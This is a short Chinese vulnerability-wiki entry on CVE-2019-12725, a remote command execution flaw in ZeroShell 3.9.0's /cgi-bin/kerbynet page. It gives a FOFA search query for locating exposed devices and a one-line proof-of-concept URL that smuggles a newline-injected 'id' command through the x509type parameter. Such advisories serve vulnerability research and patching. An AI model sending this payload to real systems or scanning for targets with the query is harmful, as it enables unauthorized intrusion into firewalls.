ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725

漏洞描述

ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面,x509type 参数过滤不严格,导致攻击者可执行任意命令

漏洞影响

[!NOTE]

ZeroShell < 3.9.0

FOFA

[!NOTE]

app="Zeroshell-防火墙"

漏洞复现

登录页面如下

验证的POC为

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:44

results matching ""

    No results matching ""